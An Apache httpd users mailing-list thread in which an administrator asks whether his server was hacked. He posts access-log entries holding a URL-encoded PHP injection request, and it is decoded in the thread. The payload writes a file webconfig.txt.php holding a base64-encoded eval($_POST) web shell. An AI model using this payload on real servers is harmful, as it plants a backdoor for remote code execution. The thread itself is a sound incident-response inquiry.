> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
> 
> What upsets me is that these two requests have status code 200, which means it 
> was successful.
> The IP is from Ukraine. Where can I find out what these %characters mean? 
> Does anyone understand what happened here? It's Apache 2.2.3 64bit.
> 
> Thanks for any hint.
> 
> Bernd
> 

What I found out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';

Currently I don't understand what this means.
I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packets to the 
network which include this IP.

Thankful for any tip.


Bernd
 






Re: [users@httpd] am i hacked ?

2017-02-06 Thread Jack Swan

I didn't decode it all.  I'll leave the rest up to you, but the %characters are 
hexadecimal characters.  Look up hex charset.  

So the first line translates to (I may have missed a char or two...)

GET /?1=@ini_set("display_errors", 
0);set_time_limit("0");@set_magic_quotes_runtime();echo  
'->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';


- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: [users@httpd] am i hacked ?

Hi,

Just now I found two very weird entries in my access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90

What upsets me is that these two requests have status code 200, which means it 
was successful.
The IP is from Ukraine. Where can I find out what these %characters mean? 
Does anyone understand what happened here? It's Apache 2.2.3 64bit.

Thanks for any hint.

Bernd

-- 
Bernd Lentes 

Systemadministration 
institute of developmental genetics 
Gebäude 35.34 - Raum 208 
HelmholtzZentrum München 
bernd.len...@helmholtz-muenchen.de 
phone: +49 (0)89 3187 1241 
fax: +49 (0)89 3187 2294 

Erst wenn man sich auf etwas festlegt kann man Unrecht haben 
Scott Adams







[users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd
Hi,

Just now I found two very weird entries in my access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90

What upsets me is that these two requests have status code 200, which means it 
was successful.
The IP is from Ukraine. Where can I find out what these %characters mean? 
Does anyone understand what happened here? It's Apache 2.2.3 64bit.

Thanks for any hint.

Bernd




